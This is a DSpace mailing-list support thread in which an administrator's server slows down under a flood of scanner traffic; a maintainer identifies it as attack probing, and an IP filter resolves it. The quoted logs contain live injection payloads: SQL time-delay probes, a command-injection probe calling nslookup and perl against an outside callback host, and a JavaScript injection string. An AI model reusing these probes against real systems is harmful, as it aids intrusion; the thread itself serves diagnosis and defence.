hello tim, i solved the problem with an ip filter, my concern was that the angular client stopped working with something more than 10 requests per second. Analyzing the rest api log, I identified that each request started to take up to 10 seconds. Then, I restart the application service (nodejs) and it was working again for a few seconds
El jue, 13 oct 2022 a la(s) 13:20, Tim Donohue ([email protected]) escribió: > Hi Nicolas, > > Those logs make it look like someone is attempting to hack into your > system or find a vulnerability by generating random URLs. > > Those "GET /communities/" paths you shared appear to have embedded SQL > commands and embedded Javascript. So, they look to be trying to determine > if there's a way to execute those commands against your system. DSpace > itself will never access or use URLs of those types. > > My recommendation would be to see if you can block the IP address which is > sending those commands. While none of those commands should do anything in > DSpace 7, they are obviously up to no good & trying to find a way to hack > your system. > > Overall, I don't see any bugs here in DSpace's behavior based on anything > you've shared. > > Tim > ------------------------------ > *From:* [email protected] <[email protected]> on > behalf of Nicolas Battaglia <[email protected]> > *Sent:* Wednesday, October 12, 2022 3:31 PM > *To:* DSpace Technical Support <[email protected]> > *Subject:* [dspace-tech] Support > > Hello everybody > > I've a problem with my dspace 7.2 PROD server > > Today the angular client stopped working, after restarting it it works for > a few minutes and stops. > > In the nodejs console I found messages similar to these > > GET > /communities/6a318891-0c45--1%20OR%202+555-555-1=0+0+0+1-b3b6-4caa1be4af44 > 404 995.928 ms - - > GET > /communities/de19a2f4-1be2-8MBJaJkQ'))%20OR%20510=(SELECT%20510%20FROM%20PG_SLEEP(15))--c80-a57a-3814a958fb8e > 404 1129.742 ms - - > GET > /communities/2'%7C%7CDBMS_PIPE.RECEIVE_MESSAGE(CHR(98)%7C%7CCHR(98)%7C%7CCHR(98),15)%7C%7C'a8a3d54-61f6-4663-a293-d7fe02058c76 > 200 800.296 ms - - > Environment: Production > GET /communities/6a318891-0c45-1*4277-b3b6-4caa1be4af44 404 779.049 ms - - > Environment: Production > Environment: Production > GET /communities/f824abaf-%7C(nslookup%20hitlerkvauufubbfc3.bxss.me > %7C%7Cperl%20-e%20%22gethostbyname('hitlerkvauufubbfc3.bxss.me')%22)a85-459f-a087-e521fd3f486f > 200 1215.078 ms - - > > *and, in my dspace.log file, some messages like this:* > > 022-10-12 03:51:55,017 ERROR unknown 70ae76ad-f77a-44f3-8932-58586342dc12 > org.dspace.app.rest.utils.DiscoverQueryBuilder @ anonymous::Error in > Discovery while setting up date facet range:date facet\colon; > org.dspace.discovery.configuration.DiscoverySearchFilterFacet@20f3548b > org.dspace.discovery.SearchServiceException: Error from server at > http://localhost:8983/solr/search: org.apache.solr.search.SyntaxError: > Cannot parse 'dateIssued_keyword:[2020 TO "+(function(){if(typeof > xwuYUD==="undefined"){var a=new Date();do{var b=new > Date();}while(b-a<0);xwuYUD=1;}}())+"]': Encountered " <RANGE_GOOP> > "undefined\"){var "" at line 1, column 62. > Was expecting one of: > "]" ... > "}" ... > > at org.dspace.discovery.SolrServiceImpl.search(SolrServiceImpl.java:726) > ~[dspace-api-7.1.1.jar:7.1.1] > > Caused by: > org.apache.solr.client.solrj.impl.HttpSolrClient$RemoteSolrException: Error > from server at http://localhost:8983/solr/search: > org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[2020 > TO "+(function(){if(typeof xwuYUD==="undefined"){var a=new Date();do{var > b=new Date();}while(b-a<0);xwuYUD=1;}}())+"]': Encountered " <RANGE_GOOP> > "undefined\"){var "" at line 1, column 62. > Was expecting one of: > "]" ... > "}" ... > > by the way, my today dspace log file is 200mb (others days is about 4mb) > > any ideas? > > thans > > > > -- > All messages to this mailing list should adhere to the Code of Conduct: > https://www.lyrasis.org/about/Pages/Code-of-Conduct.aspx > --- > You received this message because you are subscribed to the Google Groups > "DSpace Technical Support" group. > To unsubscribe from this group and stop receiving emails from it, send an > email to [email protected]. > To view this discussion on the web visit > https://groups.google.com/d/msgid/dspace-tech/CAJVJSdBYT-DbZqWjh8Buq0z8T5GbNh2KO5q-d5jjEMqXqi4pjg%40mail.gmail.com > <https://groups.google.com/d/msgid/dspace-tech/CAJVJSdBYT-DbZqWjh8Buq0z8T5GbNh2KO5q-d5jjEMqXqi4pjg%40mail.gmail.com?utm_medium=email&utm_source=footer> > . > -- All messages to this mailing list should adhere to the Code of Conduct: https://www.lyrasis.org/about/Pages/Code-of-Conduct.aspx --- You received this message because you are subscribed to the Google Groups "DSpace Technical Support" group. To unsubscribe from this group and stop receiving emails from it, send an email to [email protected]. To view this discussion on the web visit https://groups.google.com/d/msgid/dspace-tech/CAJVJSdD9EWRFOdKhnmHHYA%2B_RsyQo%2B85TD%3DNEhKv3oiEoJOCeA%40mail.gmail.com.
